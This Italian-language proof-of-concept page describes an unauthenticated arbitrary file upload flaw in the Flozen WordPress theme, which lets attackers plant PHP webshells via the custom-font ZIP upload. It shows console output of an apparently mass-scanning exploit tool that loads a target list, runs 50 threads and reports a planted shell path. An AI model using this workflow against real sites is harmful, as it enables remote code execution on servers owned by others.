
POC
Flozen < 1.5.1 - Caricamento Arbitrario di File Non Autenticato
Flozen Theme < 1.5.1 - Caricamento Arbitrario di File Non Autenticato
Descrizione
Il tema Flozen per WordPress (versioni fino alla 1.5.1 inclusa) è vulnerabile al caricamento arbitrario di file non autenticato, a causa della mancanza di controlli di autenticazione e di una validazione insufficiente del tipo di file nella funzione flozen_add_new_custom_font(). Ciò consente a utenti non autenticati di caricare file ZIP arbitrari contenenti codice PHP dannoso (es. webshell), che vengono automaticamente estratti in wp-content/uploads/nasa-custom-fonts/, portando alla piena esecuzione di codice remoto (RCE).
~ Punteggio CVSS: 9.8 (Critico)
~ Versioni Affette: < 1.5.1
- [?] Inserisci il nome del file con i target: list.txt
- [?] Inserisci i thread (5-50): 50
- [*] Caricamento target...
- [+] Caricati 267 target
- [*] Avvio 50 thread...
- [!] Non c'è il tema, fratello!: http://target.com
- [+] Via con l'exploit, amico! http://example.com/ | Versione: 1.2.8 🚩💉
- [+] Shell presente, amico! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
L'uso non autorizzato di sistemi che non possiedi o per cui non hai il permesso di testare è illegale.